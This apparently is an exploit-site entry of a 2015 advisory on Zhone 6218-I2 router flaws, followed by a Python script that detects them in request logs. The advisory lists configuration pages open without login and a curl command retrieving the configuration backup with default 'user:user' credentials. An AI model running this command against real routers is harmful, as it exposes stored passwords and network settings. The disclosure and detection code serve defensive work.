hkm / routerpwn.com

Compilation of ready to run exploits, advisories, tools and online key generators for embedded devices.

Home Page: http://www.routerpwn.com

Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)

hkm opened this issue

Exploit Title: Multiple Vulnerabilities in Zhone ADSL2+ 4 Port Wireless Bridge/Router (Broadcom)

Date: 01/09/2015

ZHONE Firmware: 03.02.20

Product Name: 6218-I2-xxx

Firmware Link: http://www.zhone.com/support/downloads/cpe/6218-I2/6218-I2_R030220_AnnexA.zip (Login Required)

Author: Mahmoud Khaled

Contact: mahmoud_khld@yahoo.com

Patch/Fix: Vendor has not provided (and won't provide) any fix for this yet

Disclosure Timeline

01/09/2015 Contacted Vendor/Vulnerability Explained
01/09/2015 Vendor Replied Denying Responsibility of The Product
01/09/2015 Full Disclosure

Description

A. The following links can be accessed without any authentication:
http:///pvccfg.cgi
http:///dnscfg.cgi
http:///password.cgi (In addition to text storage of sensitive information)

B. Obtaining backup DSL router configurations by a user account authentication:
curl "http:///backupsettings.conf" -H "Authorization: Basic dXNlcjp1c2Vy" ("dXNlcjp1c2Vy" = "user:user" in base64)
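
Detection sketch for items A and B above, added here as an example and not part of the original advisory: it scans HTTP request events from a network sensor or reverse proxy in front of the device and flags configuration pages served without credentials and backups served to a non-admin account. The JSON-lines event format, the sample events and the admin account name "admin" are assumptions made for illustration.

```python
import base64
import json
from urllib.parse import urlsplit

# Paths named in the advisory (sections A and B).
NO_AUTH_PAGES = {"/pvccfg.cgi", "/dnscfg.cgi", "/password.cgi"}
BACKUP_PATH = "/backupsettings.conf"
ADMIN_USERS = {"admin"}  # assumption: name of the administrative account

# Constructed sample events in an assumed JSON-lines format (one request per line).
SAMPLE_LOG = """\
{"src": "192.168.1.50", "uri": "/password.cgi", "authorization": null, "status": 200}
{"src": "192.168.1.50", "uri": "/backupsettings.conf", "authorization": "Basic dXNlcjp1c2Vy", "status": 200}
{"src": "192.168.1.10", "uri": "/backupsettings.conf", "authorization": "Basic YWRtaW46ZXhhbXBsZQ==", "status": 200}
{"src": "192.168.1.51", "uri": "/dnscfg.cgi?x=1", "authorization": null, "status": 401}
"""

def basic_username(header):
    """Return the username from a Basic Authorization header, or None."""
    if not header or not header.lower().startswith("basic "):
        return None
    try:
        decoded = base64.b64decode(header[6:].strip(), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    return decoded.decode("utf-8", "replace").split(":", 1)[0]

def classify(event):
    """Return a finding label for one request event, or None."""
    path = urlsplit(event["uri"]).path.lower()
    user = basic_username(event.get("authorization"))
    served = 200 <= event.get("status", 0) < 300
    if path in NO_AUTH_PAGES and served and user is None:
        return "A: configuration page served without authentication"
    if path == BACKUP_PATH and served and user is not None and user not in ADMIN_USERS:
        return f"B: configuration backup served to non-admin account '{user}'"
    return None

def scan(log_text):
    """Return (src, uri, finding) for every flagged event in the log."""
    findings = []
    for line in filter(str.strip, log_text.splitlines()):
        event = json.loads(line)
        label = classify(event)
        if label:
            findings.append((event["src"], event["uri"], label))
    return findings

if __name__ == "__main__":
    for src, uri, label in scan(SAMPLE_LOG):
        print(f"{src} {uri} -> {label}")
```

Since the advisory states that no vendor fix is available, findings of either kind point to restricting access to the management interface at the network level.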